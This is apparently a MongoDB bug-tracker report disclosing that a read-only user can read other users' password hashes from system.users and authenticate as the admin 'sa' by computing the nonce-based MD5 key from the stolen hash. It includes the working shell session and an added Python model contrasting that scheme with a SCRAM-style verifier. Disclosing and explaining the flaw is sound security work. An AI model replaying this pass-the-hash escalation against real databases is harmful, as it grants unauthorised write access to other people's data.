Core Server / SERVER-6031

read only user can get write priority


    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical - P2
    • Resolution: Duplicate
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security
    • Labels: None
    • Environment: all
    • Operating System: ALL

      Description

      A read-only user can get write priority by accessing other users' pwd hash

      sample:

      > db.system.users.find()
      { "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" }
      { "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

      > db.$cmd.findOne({getnonce:1})
      { "nonce" : "9892be9572e9851e", "ok" : 1 }

      > db.runCommand({ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
      { "ok" : 1 }
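
Added example (not part of the original report and not MongoDB code): a Python model of the check the session above implies, where the stored pwd field is all that is needed to compute an accepted key, next to a simplified SCRAM-style verifier (RFC 5802 construction with SHA-256) in which the stored value alone does not authenticate. Function names, salt, password and auth message are constructed for illustration; the nonce and the "sa" row are the ones shown in the report.

```python
import hashlib
import hmac

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

# Scheme in the report: key = hex_md5(nonce + user + stored pwd field).
def cr_key(nonce: str, user: str, stored_pwd: str) -> str:
    return md5_hex(nonce + user + stored_pwd)

def cr_verify(users: dict, nonce: str, user: str, key: str) -> bool:
    # The server checks the response with nothing but the stored field, so
    # whoever can read that field can compute an accepted key.
    return hmac.compare_digest(cr_key(nonce, user, users[user]), key)

# Contrast: SCRAM-style verifier (RFC 5802 construction, SHA-256).
def client_key(password: str, salt: bytes) -> bytes:
    salted = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 4096)
    return hmac.new(salted, b"Client Key", hashlib.sha256).digest()

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def scram_proof(ckey: bytes, auth_msg: bytes) -> bytes:
    stored = hashlib.sha256(ckey).digest()
    return xor(ckey, hmac.new(stored, auth_msg, hashlib.sha256).digest())

def scram_verify(stored_key: bytes, auth_msg: bytes, proof: bytes) -> bool:
    # The server stores only H(ClientKey); it recovers ClientKey from the
    # proof and re-hashes it. The stored value alone cannot yield a valid proof.
    ckey = xor(proof, hmac.new(stored_key, auth_msg, hashlib.sha256).digest())
    return hmac.compare_digest(hashlib.sha256(ckey).digest(), stored_key)

def demo() -> tuple:
    users = {"sa": "84c689ded211fb631fd5f5dedc5d4539"}  # row from the report
    nonce = "9892be9572e9851e"                           # nonce from the report
    cr_from_hash = cr_verify(users, nonce, "sa", cr_key(nonce, "sa", users["sa"]))
    salt, auth = b"constructed-salt", b"constructed-auth-message"
    ckey = client_key("constructed-password", salt)
    stored = hashlib.sha256(ckey).digest()               # what the server keeps
    with_password = scram_verify(stored, auth, scram_proof(ckey, auth))
    with_stored_only = scram_verify(stored, auth, scram_proof(stored, auth))
    return cr_from_hash, with_password, with_stored_only

if __name__ == "__main__":
    print(demo())
```
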


              People

              Assignee: Unassigned
              Reporter: syre xie zhenye